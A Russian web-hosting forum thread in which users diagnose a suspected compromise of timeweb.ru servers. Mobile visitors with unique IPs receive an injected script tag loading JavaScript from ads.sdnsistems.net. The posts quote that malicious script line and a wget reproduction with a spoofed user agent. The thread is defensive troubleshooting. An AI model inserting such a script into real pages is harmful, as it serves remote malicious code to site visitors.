Форум Сайтостроение Хостинг

timeweb.ru взломан?

12345678 9
P0
На сайте с 26.05.2011
Offline
79
pr0gz
14858

На любой странице, если зайти с мобильного содержится код 

<script type="text/javascript" src="http://ads.sdnsistems.net/mob.php?17657209180"></script>
. Причем он появляется только в случае уникального ip. Это точно не взлом моего сайта, т.к .htaccess чистый, а сам сайт очень простой (пара скриптов php), никакую закладку спрятать нереально. Кроме того я попробовал создать скрипт 

<? phpinfo();
и этот зловред все равно появляется в коде страницы. Наводит на мысль, что на сервера внедрили руткит или что-то подобное.
vandamme
На сайте с 30.11.2008
Offline
672
vandamme
#1

может на мобильнике вирус?

сам с мобильника новости почитываю на крупных порталах и частенько вылазят левые сайты обновить оперу :)

P0
На сайте с 26.05.2011
Offline
79
pr0gz
#2

Нет, код ведь я нашел с обычного браузера с прокси и с измененным юзер-агентом.

Mik Foxi
На сайте с 02.03.2011
Offline
1076
Mik Foxi
#3

ТС дайте ссылку на ваш сайт. Чтоб убедиться что это у всех так, а не ваш комп с вирусней.

Антибот, антиспам, веб файрвол, защита от накрутки поведенческих: https://antibot.cloud/ + партнерка, до 40$ с продажи.
GC
На сайте с 09.04.2007
Offline
159
GKC
#4

сам тайм веб и мои сайты на нем вроде в норме...

На каком сервере таймвеба ваш сайт?

Автоматическое удаление информации (http://www.gkclab.com/russ/terminator/terminator.html) ... Мистический туризм (http://mystictourism.com/) в гости к призракам...
P0
На сайте с 26.05.2011
Offline
79
pr0gz
#5
foxi:
ТС дайте ссылку на ваш сайт. Чтоб убедиться что это у всех так, а не ваш комп с вирусней.

Возможно и мой комп. Но как я сказал - зловред появляется только 1 раз для уникального ip. Публичные прокси тоже не катят, чтобы его обнаружить. Если бы мой комп был заражен, он бы показывался каждый раз, имхо. Тот сайт палить не буду, код вылезает на всех доменах и скриптах http://pr0gzon.tmweb.ru/

GC
На сайте с 09.04.2007
Offline
159
GKC
#6

Подозреваю вы же сами и залили со своего компа на хост вира....

За неск. лет работы на таймвебе всего раз-два ловил там виров.. и то после серьезных атак когда пол сервера валилось.. а не только мои сайты

Chained
На сайте с 10.01.2013
Offline
92
Chained
#7

Установил user agent switcher для chrome

Прикинулся андройдом

Загуглил сайт на tmweb.ru, нашел http://zakupki.prstartup.tmweb.ru/main/notice/?ID=13433

Зашел, открыл исходный код, не нашел mob.php

P0
На сайте с 26.05.2011
Offline
79
pr0gz
#8

Только что проверил, код вылезает на всех сайтах которые на этом ip (176.57.209.180). На других сайтах все нормально. Это точно не проблема моего компа.

K
На сайте с 11.08.2005
Offline
172
kpv
#9
pr0gz:
http://pr0gzon.tmweb.ru/

подтверждаю наличие постороннего кода по указанному адресу.


wget  --user-agent="Mozilla/5.0 (Linux; U; Android 2.3.6; ru-ru; GT-S6102 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"  http://pr0gzon.tmweb.ru/

фрагмень загруженного html


<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /><script type="text/javascript" src="http://ads.sdnsistems.net/mob.php?17657209180"></script></head>
<body><div class="center">
<table border="0" cellpadding="3" width="600">
<tr class="h"><td>
<a href="http://www.php.net/"><img border="0" src="/index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" /></a><h1 class="p">PHP Version 5.3.18</h1>
</td></tr>
</table><br />
<table border="0" cellpadding="3" width="600">
<tr><td class="e">System </td><td class="v">Linux aristotle.timeweb.ru 2.6.32.60-bitrix10 #1 SMP Wed Feb 20 02:32:35 MSK 2013 x86_64 </td></tr>

При повторной загрузке кода нет


ls -l index.html*
-rw-r--r--  1 user  wheel  81304 Jun 21 21:45 index.html
-rw-r--r--  1 user  wheel  81212 Jun 21 21:50 index.html.1

Фрагмент, где был посторонний код выглядит так


</style>
<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><div class="center">
Хостинг в Рестоне (http://ruweb.ws/?page=price), Москве (http://ruweb.net/?page=price&type=unlim), Нижнем Новгороде (http://ruweb-nn.ru/hosting.html). Регистрация доменов, аренда серверов с администрированием.
T
На сайте с 09.12.2011
Offline
55
tls
#10
pr0gz:
На любой странице, если зайти с мобильного содержится код ... Причем он появляется только в случае уникального ip. Это точно не взлом моего сайта, т.к .htaccess чистый

Встречал подобное, в том случае был порутан сервер и внедрен левый модуль в Апач.

12345678 9

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий